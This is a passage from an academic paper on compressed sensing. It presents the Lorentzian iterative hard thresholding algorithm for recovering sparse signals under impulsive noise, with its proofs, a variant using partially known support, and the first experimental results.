Let $\Phi$ be an $m\times n$ sensing matrix, $m<n$, with rows that form a set of vectors incoherent with the sparsity basis [@Cand08b]. The signal $x$ is measured by $y=\Phi x+z$, where $z$ is the measurement (sampling) noise. It has been shown that a linear program (Basis Pursuit) can recover the original signal, $x$, from $y$ [@Cand08b]. However, there are several reconstruction methods that yield perfect or approximate reconstructions proposed in the literature (see [@Cand08b; @Need08; @Chart08; @Blu10] and references therein). Most CS algorithms use the $L_2$ norm as the metric for the residual error. However, it is well-known that LS based estimators are highly sensitive to outliers present in the measurement vector leading to a poor performance when the noise no longer follows the Gaussian assumption but, instead, is better characterized by heavier-than-Gaussian tailed distributions [@Hube81; @Arce05; @Carr08; @Carr10d].
In [@Carr10] we propose a robust reconstruction approach coined Lorentzian basis pursuit (BP). This method is a robust algorithm capable of reconstructing sparse signals in the presence of impulsive sampling noise. We use the following non-linear optimization problem to estimate $x_0$ from $y$: $$\label{LLP}
\min_{x\in \mathbb{R}^n } \|x\|_{1}~\textrm{subject~to}~\|y-\Phi x\|_{LL_2,\gamma}\leq\epsilon$$ where $$\| u \|_{LL_2,\gamma}=\sum_{i=1}^{m} \log \{1+\gamma^{-2}u_i^2 \},~~u\in\mathbb{R}^m,~\gamma>0,$$ is the Lorentzian or $LL_2$ norm. The $LL_2$ norm does not over penalize large deviations, as in the $L_2$ and $L_1$ norms cases, and is therefore a robust metric appropriate for impulsive environments [@Carr10; @Carr10d]. The performance analysis of the algorithm is based on the so called restricted isometry properties (RIP) of the matrix $\Phi$ [@Cand08b; @Cand08], which are defined in the following.
The $s$-restricted isometry constant of $\Phi$, $\delta_s$, is defined as the smallest positive quantity such that $$(1-\delta_s)\|v\|_{2}^{2}\leq \|\Phi v\|_{2}^{2}\leq (1+\delta_s)\|v\|_{2}^{2}$$ holds for all $v\in \Omega_s$, where $\Omega_s=\{ v\in \mathbb{R}^n | \|v\|_0\leq s\}$. A matrix $\Phi$ is said to satisfy the RIP of order $s$ if $\delta_s\in (0,1)$.
Carrillo *et. al* show in [@Carr10] that if $\Phi$ meets the RIP of order $2s$, with $\delta_{2s}<\sqrt{2}-1$, then, for any $s$-sparse signal $x_0$ and observation noise $z$ with $\|z\|_{LL_2,\gamma}\leq \epsilon$, the solution to , denoted as $x^*$, obeys $$\label{thm1bound}
\|x^*-x_0\|_2 \leq C_s \cdot2\gamma \cdot \sqrt{m(e^{\epsilon}-1)},$$ where $C_s$ is a small constant. One remark is that $\gamma$ controls the robustness of the employed norm and $\epsilon$ the radius of the feasibility set $LL_2$ ball.
Although Lorentzian BP outperforms state of the art CS recovery algorithms in impulsive environments and achieves comparable performance in less demanding light-tailed environments, numerical algorithms to solve the optimization problem posed by Lorentzian BP are extremely slow and complex [@Carr10]. Therefore, faster and simpler methods are sought to solve the sparse recovery problem in the presence of impulsive sampling noise.
Iterative hard thresholding {#ssec:IHT}
---------------------------
The iterative hard thresholding (IHT) algorithm is a simple iterative method that does not require matrix inversion at any point and provides near-optimal error guarantees [@Blu09; @Blu10]. The algorithm is described as follows.
Let $x^{(t)}$ denote the solution at iteration time $t$ and set $x^{(0)}$ to the zero vector. At each iteration $t$ the algorithm computes $$x^{(t+1)}=H_s\left ( x^{(t)}+\mu\Phi^T(y-\Phi x^{(t)}) \right ),$$ where $H_s(a)$ is the non-linear operator that sets all but the largest (in magnitude) $s$ elements of $a$ to zero and $\mu$ is a step size. If there is no unique set, a set can be selected either randomly or based on a predefined ordering. Convergence of this algorithm is proven in [@Blu08] under the condition that $\|\Phi\|_{2\rightarrow 2}<1$, where $\|\Phi\|_{2\rightarrow 2}$ represents the spectral norm of $\Phi$, and a theoretical analysis for compressed sensing problems is presented in [@Blu09; @Blu10]. Blumensath and Davies show in [@Blu09] that if $\|z\|_2\leq \epsilon$ ($L_2$ bounded noise) and $\delta_{3s}<1/\sqrt{32}$, the reconstruction error of the IHT algorithm at iteration $t$ is bounded by $$\|x-x^{(t)}\|_2\leq \alpha^t \|x\|_2 + \beta \epsilon,$$ where $\alpha<1$ and $\beta$ are absolute constants that depend only on $\delta_{2s}$ and $\delta_{3s}$.
Compressed sensing with partially known support {#ssec:CSPKS}
-----------------------------------------------
Recent works show that modifying the CS framework to include prior knowledge of the support improves the reconstruction results using fewer measurements [@Vaswani09; @Jac09]. Let $x\in \mathbb{R}^n$ be an sparse or compressible signal in some basis $\Psi$ and denote $T=\text{supp}(x)$. In this setting, we assume that $T$ is partially known, *i.e.* $T=T_0\cup\Delta$. The set $T_0\subset\{1,\ldots,n\}$ is the *a priori* knowledge of the support of $x$ and $\Delta\subset\{1,\ldots,n\}$ is the unknown part of the support. This scenario is typical in many real signal processing applications, *e.g.*, the lowest subband coefficients in a wavelet decomposition, which represent a low frequency approximation of the signal, or the first coefficients of a DCT transform of an image with a constant background, are known to be significant components.
The *a priori* information modified CS seeks out a signal that explains the measurements and whose support contains the smallest number of new additions to $T_0$. Vaswani *et al.* modify BP in [@Vaswani09] to find an sparse signal assuming uncorrupted measurements. This technique is extended by Jacques in [@Jac09] to the case of corrupted measurements and compressible signals. Jacques finds sufficient conditions in terms of RIP for stable reconstruction in this general case. The approach solves the following optimization program $$\label{iBPD}
\min_{x\in \mathbb{R}^n} \|x_{T_0^c}\|_{1}~~\textrm{s.~t.}~~\|y-\Phi x\|_{2}\leq\epsilon,$$ where $x_{\Omega}$ denotes the vector $x$ with everything except the components indexed in $\Omega\subset\{1,\ldots,n\}$ set to 0.
Although the modified CS approach needs fewer samples to recover a signal, the computational cost of solving can be high, or complicated to implement. Therefore, we extend the ideas of modified CS to iterative approaches, such as greedy algorithms [@Trop07; @Need08] and iterative reweighted least squares methods [@Carr09a], in [@Carr10c]. Even though the aforementioned methods are more efficient than BP, in terms of computational cost, a disadvantage is that these methods need to invert a linear system at each iteration. In the following section we develop a robust algorithm, inspired by the IHT algorithm, capable of diminishing the effect of impulsive noise and also capable of including partial support information.
Lorentzian based Iterative Hard Thresholding Algorithm {#sec:CH6LIHT}
======================================================
In this section we propose a Lorentzian derived IHT algorithm for the recovery of sparse signals when the measurements are (possibly) corrupted by impulsive noise. First, we present the algorithm formulation and derive theoretical guarantees. Then, we describe how to optimize the algorithm parameters for enhanced performance.
Algorithm formulation and stability guarantees
----------------------------------------------
Let $x_0\in \mathbb{R}^n$ be an $s$-sparse or $s$-compressible signal, $s < n$. Consider the sampling model $$y=\Phi x_0 +z,$$ where $\Phi$ is an $m\times n$ sensing matrix and $z$ denotes the sampling noise vector. In order to estimate $x_0$ from $y$ we pose the following optimization problem: $$\label{Ch6P0}
\min_{x\in \mathbb{R}^n} \|y-\Phi x\|_{LL_2,\gamma}~~\text{subject to}~~\|x\|_0\leq s.$$ However, the problem in is non-convex and combinatorial. Therefore, we derive a suboptimal strategy to estimate $x_0$ based on the gradient projection algorithm [@Bertsekas99] since the Lorentzian norm is an everywhere continuous and differentiable function [@Carr10d]. The proposed strategy is formulated as follows. Let $x^{(t)}$ denote the solution at iteration time $t$ and set $x^{(0)}$ to the zero vector. At each iteration $t$ the algorithm computes $$\label{Ch6update}
x^{(t+1)}=H_s\left ( x^{(t)}+\mu g^{(t)} \right )$$ where $H_s(a)$ is the non-linear operator that sets all but the largest (in magnitude) $s$ elements of $a$ to zero, $\mu$ is a step size and $$g=-\nabla_{x}\|y-\Phi x\|_{LL_2,\gamma}.$$ If there is no unique set, a set can be selected either randomly or based on a predefined ordering. The negative gradient, $g$, can be expressed in the following form. Denote $\phi_i$ as the $i$-th row vector of $\Phi$. Then $$g^{(t)}=\Phi^{T}W_{t}(y-\Phi x^{(t)})$$ where $W_{t}$ is an $m\times m$ diagonal matrix with each element on the diagonal defined as $$\label{Ch6weight}
[W_{t}]_{i,i}=\frac{\gamma^2}{\gamma^2+(y_i-\phi^{T}_i x^{(t)})^2},~~i=1,\ldots,m.$$ We coined the algorithm defined by the update in Lorentzian iterative hard thresholding (LIHT). The derived algorithm is almost identical to LS based IHT in terms of computational load except for the additional cost of computing the $m$ weights in and a multiplication by an $m\times m$ diagonal matrix, with the advantage of robustness against heavy-tailed impulsive noise. Therefore the computational complexity per iteration of LIHT remains $\mathcal{O}(mn)$, which is limited by the application of the sensing operator $\Phi$ and its adjoint $\Phi^T$. If fast sensing operators are available then the computational complexity is reduced. Note that $[W_{t}]_{i,i}\leq 1$, with the weights going to zero when large deviations, compared to $\gamma$, are detected. In fact, if $W_t=I$ the algorithm reduces to the LS based IHT. Thus, the algorithm can be seen as a reweighted least squares thresholding approach, on which the weights diminish the effect of gross errors assigning a small weight for large deviations and a weight near one for deviations close to zero. Figure \[Ch6fig:0b\] shows an example of the obtained weight function with $\gamma=1$.
In the following, we show that LIHT has theoretical stability guarantees similar to those of IHT. For simplicity of the analysis we set $\mu=1$, as in [@Blu09].
\[LIHTthm1\] Let $x_0\in \mathbb{R}^n$. Define $S=\text{supp}(x_0)$, $|S|\leq s$. Suppose $\Phi \in \mathbb{R}^{m\times n}$ meets the RIP of order $3s$ and $\|\Phi\|_{2\rightarrow 2}\leq 1$. Assume $x^{(0)}=0$. Then if $\|z\|_{LL_2,\gamma}\leq \epsilon$ and $\delta_{3s}<1/\sqrt{32}$, the reconstruction error of the LIHT algorithm at iteration $t$ is bounded by $$\|x_0-x^{(t)}\|_2\leq \alpha^t \|x_0\|_2 + \beta \gamma\sqrt{m(e^{\epsilon}-1)},$$ where $\alpha=\sqrt{8}\delta_{3s}$ and $\beta=\sqrt{1+\delta_{2s}}(1-\alpha^t)(1-\alpha)^{-1}$.
Proof of Theorem \[LIHTthm1\] follows from the fact that $W_{t}(i,i)\leq 1$, which implies that $$\|W_t z \|_2\leq \|z\|_2\leq \gamma\sqrt{m(e^{\epsilon}-1)},$$ where the second inequality follows from Lemma 1 in [@Carr10]. Argument details parallel those of the proof of Theorem \[Ch6thm2\] in the next section and, in fact, Theorem \[LIHTthm1\] is a particular case of Theorem \[Ch6thm2\]. Therefore we provide only a proof for the later.
Although the algorithm is not guaranteed to converge to a global minima of , it can be shown that LIHT converges to a local minima since $[W_{t}]_{i,i}\leq 1$. Thus the eigenvalues of $\Phi^T W_{t}\Phi$ are bounded above by the eigenvalues of $\Phi^T\Phi$ and the sufficient condition $\|\Phi\|_{2\rightarrow 2}\leq 1$ guarantees local convergence [@Blu09]. Notice that the RIP sufficient condition for stable recovery is identical to the one required by the LS based IHT algorithm [@Blu09].
The results in Theorem \[LIHTthm1\] can be easily extended to compressible signals using Lemma 6.1 in [@Need08]. Suppose $x_0\in \mathbb{R}^n$ is a $s$-compressible signal. Suppose $\Phi \in \mathbb{R}^{m\times n}$ meets the RIP of order $3s$ and $\|\Phi\|_{2\rightarrow 2}\leq 1$. Assume $x^{(0)}=0$. Then, if the conditions of Theorem \[LIHTthm1\] are met, the reconstruction error of the LIHT algorithm at iteration $t$ is bounded by $$\|x_0-x^{(t)}\|_2\leq \eta \left (\|x_0-x_s\|_2+\frac{\|x_0-x_s\|_1}{\sqrt{s}} \right )+\alpha^t \|x_0\|_2 + \beta \gamma\sqrt{m(e^{\epsilon}-1)},$$ where $\alpha=\sqrt{8}\delta_{3s}$, $\beta=\sqrt{1+\delta_{2s}}(1-\alpha^t)(1-\alpha)^{-1}$, $\eta=\sqrt{1+\delta_s}$ and $x_s$ is the best $s$-term approximation of $x_0$.
Parameter tuning {#ssec:CH6PT}
----------------
The performance of the LIHT algorithm depends on the scale parameter $\gamma$ of the Lorentzian norm and the step size, $\mu$. Therefore, we detail methods to estimate these two parameters in the following.
It is observed in [@Carr10] that setting $\gamma$ to half the sample range of $y$, $(y_{(1)}-y_{(0)})/2$ (where $y_{(q)}$ denotes the $q$-th quantile of $y$), often makes the Lorentzian norm a fair approximation to the $L_2$ norm. Therefore, the optimal value of $\gamma$ should be $(y'_{(1)}-y'_{(0)})/2$, where $y'=\Phi x_0$ is the uncorrupted measurement vector. Since the uncorrupted measurements are unknown, we propose to estimate the scale parameter as $$\label{Ch6gamma}
\gamma=\frac{y_{(0.875)}-y_{(0.125)}}{2}.$$ This value of $\gamma$ considers implicitly a measurement vector with 25$\%$ of the samples corrupted by outliers and 75$\%$ well behaved. Experimental results show that this estimate leads to good performance in both Gaussian and impulsive environments (see Section \[sec:CH6Res\] below).
As described in [@Blu10], the convergence and performance of the LS based IHT algorithm improve if an adaptive step size, $\mu^{(t)}$, is used to normalize the gradient update. We use a similar approach in our algorithm. Let $S^{(t)}$ be the support of $x^{(t)}$ and suppose that the algorithm has identified the true support of $x_0$, *i.e.* $S^{(t)}=S^{(t+1)}=S$. In this case we want to minimize $\|y-\Phi_{S}x_{S}\|_{LL_2,\gamma}$ using a gradient descent algorithm with updates of the form $$x^{(t+1)}_{S}=x^{(t)}_{S}+\mu^{(t)} g^{(t)}_{S}.$$ Finding the optimal $\mu$, *i.e.*, a step size that maximally reduces the objective at each iteration, is not an easy task and in fact there is no known closed form for such an optimal step. To overcome this limitation, we propose to use the following suboptimal approach. We update the step size at each iteration as $$\begin{aligned}
\mu^{(t)}&=\min_{\mu}\|W_t^{1/2}[y-\Phi_{S}(x^{(t)}_{S}+\mu g^{(t)}_{S})] \|_2^2\\ \nonumber
&=\frac{\|g^{(t)}_{S}\|_2^2}{\|W_t^{1/2}\Phi_{S}g^{(t)}_{S} \|_2^2},\end{aligned}$$ which guarantees that the objective Lorentzian function is not increased at each iteration.
\[Ch6stepupdate\] Let $\mu^{(t)}=\|g^{(t)}_{S}\|_2^2/\|W_t^{1/2}\Phi_{S}g^{(t)}_{S} \|_2^2$ and $x^{(t+1)}_{S}=x^{(t)}_{S}+\mu^{(t)} g^{(t)}_{S}$. Then, if $S^{(t)}=S^{(t+1)}=S$, the update guarantees that $$\|y-\Phi x^{(t+1)}\|_{LL_2,\gamma}\leq \|y-\Phi x^{(t)}\|_{LL_2,\gamma}.$$
Before proving Proposition \[Ch6stepupdate\], we need a known result for square concave functions that will be used in the proof.
\[Ch6scf\] Let $f(a)=g(a^2)$ with $g$ concave. Then for any $a,b\in \mathbb{R}$ we have the following inequality: $$f(a)-f(b)\leq \frac{f'(b)}{2b}(a^2-b^2)$$ which is the differential criterion for the concavity of $g$.
Now we can prove Proposition \[Ch6stepupdate\].
Define $$f(a)=\log \left ( 1+\frac{a^2}{\gamma^2} \right )~~\text{and}~~r^{(t)}=y-\Phi x^{(t)}.$$ Using Proposition \[Ch6scf\] and the fact that $f(x)$ is square concave, we have the following inequality: $$\begin{aligned}
\sum_{i=1}^m f([r^{(t+1)}]_i)-f([r^{(t)}]_i)&\leq \frac{1}{2}\sum_{i=1}^m \frac{f'([r^{(t)}]_i)}{[r^{(t)}]_i}([r^{(t+1)}]_i^2-[r^{(t)}]_i^2)\\
&=\frac{1}{2\gamma^2}\sum_{i=1}^m[W_t]_{ii}[r^{(t+1)}]_i^2
+\frac{1}{2\gamma^2}\sum_{i=1}^m[W_t]_{ii}[r^{(t)}]_i^2.\end{aligned}$$ This is equivalent to $$\begin{aligned}
\|y-\Phi x^{(t+1)}\|_{LL_2,\gamma} &-\|y-\Phi x^{(t)}\|_{LL_2,\gamma}\\
&\leq \frac{1}{2\gamma^2}\|W_t^{1/2}(y-\Phi x^{(t+1)})\|_2^2 -\frac{1}{2\gamma^2}\|W_t^{1/2}(y-\Phi x^{(t)})\|_2^2.\end{aligned}$$ From the optimality of $\mu^{(t)}$ we have $$\|W_t^{1/2}(y-\Phi x^{(t+1)})\|_2^2 -\|W_t^{1/2}(y-\Phi x^{(t)})\|_2^2\leq 0.$$ Therefore $$\|y-\Phi x^{(t+1)}\|_{LL_2,\gamma} -\|y-\Phi x^{(t)}\|_{LL_2,\gamma}\leq 0$$ which is the desired result.
Notably, if the support of $x^{(t+1)}$ differs from the support of $x^{(t)}$, the optimality of $\mu^{(t)}$ is no longer guaranteed. Thus, if $$\|y-\Phi x^{(t+1)}\|_{LL_2,\gamma}> \|y-\Phi x^{(t)}\|_{LL_2,\gamma},$$ we use a backtracking line search strategy and reduce $\mu^{(t)}$ geometrically, *i.e.* $\mu^{(t)}\leftarrow \mu^{(t)}/2$, until the objective function in is reduced.
Lorentzian Iterative Hard Thresholding with Prior Information {#sec:CH6PI}
=============================================================
In this section we modify the LIHT algorithm to incorporate prior signal information into the recovery process. The LIHT algorithm constructs an estimate of the signal at each iteration, thereby incorporating prior knowledge at each step of the recursion. In the following we propose extensions of the LIHT algorithm to incorporate partial support knowledge. We describe then a general modification to include the model-based CS framework of [@Barak10a].
Lorentzian iterative hard thresholding with partially known support {#ssec:CH6PKS}
-------------------------------------------------------------------
Let $x_0\in \mathbb{R}^n$ be an $s$-sparse or $s$-compressible signal, $s < n$. Consider the sampling model $y=\Phi x_0 +z$, where $\Phi$ is an $m\times n$ sensing matrix and $z$ denotes the sampling noise vector. Denote $T=\text{supp}(x_0)$ and assume that $T$ is partially known, *i.e.* $T=T_0\cup\Delta$. Define $k=|T_0|$. We propose a simple extension of the LIHT algorithm that incorporates the partial support knowledge into the recovery process. The modification of the algorithm is described in the following.
Denote $x^{(t)}$ as the solution at iteration $t$ and set $x^{(0)}$ to the zero vector. At each iteration $t$ the algorithm computes $$x^{(t+1)}=H_{s-k}^{T_0}\left ( x^{(t)}+^{(t)}\Phi^T W_t(y-\Phi x^{(t)}) \right ),$$ where the nonlinear operator $H_u^{\Omega}(\cdot)$ is defined as $$H_u^{\Omega}(a)=a_{\Omega}+H_u(a_{\Omega^{c}}),~\Omega\subset\{1,\ldots,n\}.$$
The algorithm selects the $s-k$ largest (in magnitude) components that are not in $T_0$ and preserves all components in $T_0$ at each iteration. We coin this algorithm Lorentzian iterative hard thresholding with partially known support (LIHT-PKS).
The main result of this section, Theorem \[Ch6thm2\] below, shows the stability of LIHT-PKS and establish sufficient conditions for stable recovery in terms of the RIP of $\Phi$. In the following we show that LIHT-PKS has theoretical stability guarantees similar to those of IHT [@Blu09]. For simplicity of the analysis, we set $\mu=1$ as in section \[sec:CH6LIHT\].
\[Ch6thm2\] Let $x\in \mathbb{R}^n$. Define $T=\text{supp}(x)$ with $|T|=s$. Also define $T=T_0\cup \Delta$ and $|T_0|=k$. Suppose $\Phi \in \mathbb{R}^{m\times n}$ meets the RIP of order $3s-2k$ and $\|\Phi\|_{2\rightarrow 2}\leq 1$. Then if $\|z\|_{LL_2,\gamma}\leq \epsilon$ and $\delta_{3s-2k}<1/\sqrt{32}$, the reconstruction error of the IHT-PKS algorithm at iteration $t$ is bounded by $$\|x_0-x^{(t)}\|_2\leq \alpha^t \|x\|_2 + \beta \gamma\sqrt{m(e^{\epsilon}-1)},$$ where $$\alpha=\sqrt{8}\delta_{3s-2k}~~\text{and}~~\beta=\sqrt{1+\delta_{2s-k}}\left ( \frac{1-\alpha^t}{1-\alpha}\right ).$$
Suppose $x\in\mathbb{R}^n$ and $T=\mbox{supp}(x)$, $|T|=s$ ($s$-sparse signal). If $T=T_0\cup \Delta$, then $|\Delta|=s-k$ where $|T_0|=k$. Define $$\label{gradient}
a^{(t)}=x^{(t)}+\Phi^T W_t(y-\Phi x^{(t)}).$$ The update at each iteration $t+1$ can be expressed as: $$\label{update}
x^{(t+1)}=a^{(t)}_{T_0}+H_{s-k}(a^{(t)}_{T^c_0}),$$ therefore $x^{(t+1)}_{T_0} = a^{(t)}_{T_0}$. The residual (reconstruction error) at iteration $t$ is defined as $r^{(t)}=x-x^{(t)}$.
Define $T^{(t)}=\text{supp}(x^{(t)})$ and $U^{(t)}=\text{supp}\left(H_{s-k}(a^{(t)}_{T^c_0})\right)$. It can be easily checked for all $t$ that $|\text{supp}(a^{(t)}_{T_0})|= k$, $|U^{(t)}| = s-k$ and $|T^{(t)}| = s$. Also define $$B^{(t+1)} = T \cup T^{(t+1)}= T_0 \cup \Delta \cup U^{(t+1)}.$$ Then, the cardinality of the set $B^{(t+1)}$ is upper bounded by $$|B^{(t+1)}|\leq |T_0|+ |\Delta|+ |U^{(t+1)}|=2s-k.$$ The error $r^{(t+1)}$ is supported on $B^{(t+1)}$. Using the triangle inequality we have $$\|x_{B^{(t+1)}}-x^{(t+1)}_{B^{(t+1)}} \|_2 \leq \|x_{B^{(t+1)}}-a^{(t)}_{B^{(t+1)}}\|_2
+\|x^{(t+1)}_{B^{(t+1)}}-a^{(t)}_{B^{(t+1)}} \|_2.$$ We start by bounding $\|x^{(t+1)}_{B^{(t+1)}}-a^{(t)}_{B^{(t+1)}}
\|_2$. Remember that $x^{(t+1)}_{T_0} = a^{(t)}_{T_0}$ and that by definition of the thresholding operator, $x^{(t+1)}_{T^c_0}$ is the best ($s-k$)-term approximation to $a^{(t)}_{T^c_0}$. Thus, $x^{(t+1)}$ is closer to $a^{(t)}$ than $x$, on $B^{(t+1)}$, and we have $$\|x^{(t+1)}_{B^{(t+1)}}-a^{(t)}_{B^{(t+1)}}\|_2 \leq \|x_{B^{(t+1)}}-a^{(t)}_{B^{(t+1)}}\|_2.$$ Therefore the error at iteration $t+1$ is bounded by $$\|x_{B^{(t+1)}}- x^{(t+1)}_{B^{(t+1)}} \|_2 \leq 2
\|x_{B^{(t+1)}}-a^{(t)}_{B^{(t+1)}} \|_2.$$
Rewrite as $$a^{(t)}= x^{(t)}+\Phi^T W_t\Phi x- \Phi^T W_t\Phi x^{(t)}+ \Phi^T W_t z.$$ Denote $\Phi_{\Omega}$ as the submatrix obtained by selecting the columns indicated by $\Omega$. Then $$a^{(t)}_{B^{(t+1)}}= x^{(t)}_{B^{(t+1)}}+\Phi^T_{B^{(t+1)}} W_t\Phi r^{(t)}+ \Phi^T_{B^{(t+1)}}W_t z$$ and we can bound the estimation error as $$\begin{aligned}
\|x_{B^{(t+1)}}- x^{(t+1)}_{B^{(t+1)}} \|_2 & \leq 2\|x_{B^{(t+1)}}-x^{(t)}_{B^{(t+1)}}-\Phi^T_{B^{(t+1)}}W_t\Phi r^{(t)}-\Phi^T_{B^{(t+1)}}W_t z \|_2 \\
& \leq 2 \|r^{(t)}_{B^{(t+1)}}-\Phi^T_{B^{(t+1)}}W_t\Phi r^{(t)}\|_2 + 2\|\Phi^T_{B^{(t+1)}}W_t z \|_2 \\
& \leq 2 \|(I-\Phi^T_{B^{(t+1)}}W_t\Phi_{B^{(t+1)}})r^{(t)}_{B^{(t+1)}}- \Phi^T_{B^{(t+1)}}W_t\Phi_{B^{(t)} \backslash B^{(t+1)}}r^{(t)}_{B^{(t)} \backslash B^{(t+1)}} \|_2 \\
&+ 2\|\Phi^T_{B^{(t+1)}} W_t z \|_2 \\
& \leq 2 \|(I-\Phi^T_{B^{(t+1)}}W_t\Phi_{B^{(t+1)}})r^{(t)}_{B^{(t+1)}}\|_2\\
&+ 2 \| \Phi^T_{B^{(t+1)}}W_t\Phi_{B^{(t)} \backslash B^{(t+1)}}r^{(t)}_{B^{(t)} \backslash B^{(t+1)}} \|_2+ 2\|\Phi^T_{B^{(t+1)}}W_t z \|_2.\end{aligned}$$ Since $[W_{t}]_{i,i}\leq 1$ the eigenvalues of $\Phi^T W_{t}\Phi$ are bounded above by the eigenvalues of $\Phi^T\Phi$, and, therefore, $$\begin{aligned}
\|x_{B^{(t+1)}}- x^{(t+1)}_{B^{(t+1)}} \|_2 & \leq 2 \|(\Phi^T_{B^{(t+1)}}\Phi_{B^{(t+1)}}-I)\|_{2\rightarrow 2}\|r^{(t)}_{B^{(t+1)}}\|_2\\
&+ 2 \| \Phi^T_{B^{(t+1)}}\Phi_{B^{(t)} \backslash B^{(t+1)}}\|_{2\rightarrow 2}\|r^{(t)}_{B^{(t)} \backslash B^{(t+1)}} \|_2+ 2\|\Phi^T_{B^{(t+1)}}W_t z \|_2.\end{aligned}$$ Notice that $$\begin{aligned}
|B^{(t)} \cup B^{(t+1)}| & = |T_0 \cup \Delta \cup U^{(t+1)} \cup U^{(t)}|\\
& \leq |T_0| + |\Delta| + 2|U^{(t)}|= 3s-2k.\end{aligned}$$ Using basic properties of the restricted isometry constants (see Lemma 1 from [@Blu09]) and the fact that $\delta_{3s-2k}>\delta_{2s-k}$ we have the following. Define $\eta=2\sqrt{1+\delta_{2s-k}}$. $$\begin{aligned}
\|x_{B^{(t+1)}} - x^{(t+1)}_{B^{(t+1)}} \|_2 &\leq 2\delta_{2s-k} \| r^{(t)}_{B^{(t+1)}} \|_2 + 2\delta_{3s-2k}\| r^{(t)}_{B^{(t)} \setminus B^{(t+1)}} \|_2 + \eta\|W_t z\|_2\\
& \leq 2\delta_{3s-2k} \left(\| r^{(t)}_{B^{(t+1)}} \|_2 + \| r^{(t)}_{B^{(t)}
\setminus B^{(t+1)}} \|_2 \right) + \eta\| W_t z\|_2.\end{aligned}$$
Since $ B^{(t)} \backslash B^{(t+1)}$ and $B^{(t+1)}$ are disjoint sets we have $\| r^{(t)}_{B^{(t+1)}} \|_2 + \| r^{(t)}_{B^{(t)} \setminus B^{(t+1)}} \|_2 \leq \sqrt{2}\|r^{(t)}_{B^{(t)} \cup B^{(t+1)}} \|_2$. Thus, the estimation error at iteration $t+1$ is bounden by $$\| r^{(t+1)} \|_2 \leq \sqrt{8}\delta_{3s-2k}\| r^{(t)} \|_2 + \eta\|W_t z\|_2.$$ This is a recursive error bound. Define $\alpha=\sqrt{8}\delta_{3s-2k}$ and assume $x^{(0)}=0$. Then $$\label{series}
\| r^{(t)} \|_2 \leq \alpha^t \|x\|_2 + \eta\|W_t z\|_2
\sum_{j=0}^t \alpha^j.$$ We need $\alpha=\sqrt{8}\delta_{3s-2k} < 1$ for the series in to converge. For faster convergence and better stability we restrict $\sqrt{8}\delta_{3s-2k} < 1/2$, which yields the sufficient condition in Theorem \[Ch6thm2\]. Now we just need to bound $\|z\|_2$. Note that $[W_{t}]_{i,i}\leq 1$, which implies that $$\|W_t z \|_2\leq \|z\|_2\leq \gamma\sqrt{m(e^{\epsilon}-1)},$$ where the second inequality follows from Lemma 1 in [@Carr10].
A sufficient condition for stable recovery of the LIHT algorithm is $\delta_{3s}<1/\sqrt{32}$ (see section \[sec:CH6LIHT\]), which is a stronger condition than that required by LIHT-PKS, since $\delta_{3s-2k}<\delta_{3s}$. Having a RIP of smaller order means that $\Phi$ requires fewer rows to meet the condition, *i.e.*, fewer samples to achieve approximate reconstruction. Notice that when $k=0$ (cardinality of the partially known support), we have the same condition required by LIHT. The results in Theorem \[Ch6thm2\] can be easily extended to compressible signals using Lemma 6.1 in [@Need08], as was done in the previous section for LIHT.
Extension of Lorentzian iterative hard thresholding to model-sparse signals {#ssec:CH6MB}
---------------------------------------------------------------------------
Baraniuk *et. al* introduced a model-based CS theory that reduces the degrees of freedom of a sparse or compressible signal [@Duarte09a; @Barak10a]. The key ingredient of this approach is to use a more realistic signal model that goes beyond simple sparsity by codifying the inter-dependency structure among the signal coefficients. This signal model might be be a wavelet tree, block sparsity or in general a union of $s$-dimensional subspaces [@Barak10a].
Suppose $\mathcal{M}_{s}$ is a signal model as defined in [@Barak10a] and also suppose that $x_0 \in\mathcal{M}_{s}$ is an $s$-model sparse signal. Then, a model-based extension of the LIHT algorithm is motivated by solving the problem $$\label{Ch6PM}
\min_{x\in \mathcal{M}_{s}} \|y-\Phi x\|_{LL_2,\gamma},$$ using the following recursion: $$x^{(t+1)}=\mathbb{M}_{s}\left ( x^{(t)}+\mu^{(t)}\Phi^T W_t(y-\Phi x^{(t)}) \right ),$$ where $\mathbb{M}_{s}(a)$ is the best $s$-term model-based operator that projects the vector $a$ onto $\mathcal{M}_{s}$. One remark to make is that, under the model-based CS framework of [@Barak10a], this prior knowledge model can be leveraged in recovery with the resulting algorithm being similar to LIHT-PKS.
Experimental Results {#sec:CH6Res}
====================
Robust Reconstruction: LIHT
---------------------------
Numerical experiments that illustrate the effectiveness of the LIHT algorithm are presented in this section. All experiments utilize synthetic $s$-sparse signals in a Hadamard basis, with $s=8$ and $n=1024$. The nonzero coefficients have equal amplitude, equiprobable sign, randomly chosen position, and average power fixed to 0.78. Gaussian sensing matrices are employed with $m=128$. One thousand repetitions of each experiment are averaged and reconstruction SNR is used as the performance measure. Weighted median regression (WMR) [@Paredes10a] and LS-IHT [@Blu10] are used as benchmarks.
To test the robustness of the methods, we use two noise models: $\alpha$-stable distributed noise and Gaussian noise plus gross sparse errors. The Gaussian noise plus gross sparse errors model is referred to as contaminated $p$-Gaussian noise for the remainder of the paper, as $p$ represents the amount of gross error contamination. To validate the estimate of $\gamma$ discussed in Section \[ssec:CH6PT\] we make a comparison between the performance of LIHT equipped with the optimal $\gamma$, denoted as LIHT-$\gamma_1$, and the signal-estimated $\gamma$, denoted as LHIT-$\gamma_2$. The optimal $\gamma$ is set as half the sample range of the clean measurements.
For the first experiment we consider a mixed noise environment, using contaminated $p$-Gaussian noise. We set the Gaussian component variance to $\sigma^2=10^{-2}$, resulting in an SNR of 18.9321 dB when $p=0$. The amplitude of the outliers is set as $\delta=10^{3}$ and $p$ is varied from $10^{-3}$ to $0.5$. The results are shown in Figure \[Ch6fig:1\] (a). The results demonstrate that LIHT outperforms WMR and IHT. Moreover, the results also demonstrate the validity of the estimated $\gamma$. Although the reconstruction quality achieved by LIHT-$\gamma_2$ is lower than that achieved LIHT-$\gamma_1$, the SNR of LIHT-$\gamma_2$ is greater than 20 dB for a broad range of contamination factors $p$, including contaminations up to 5% of the measurements.
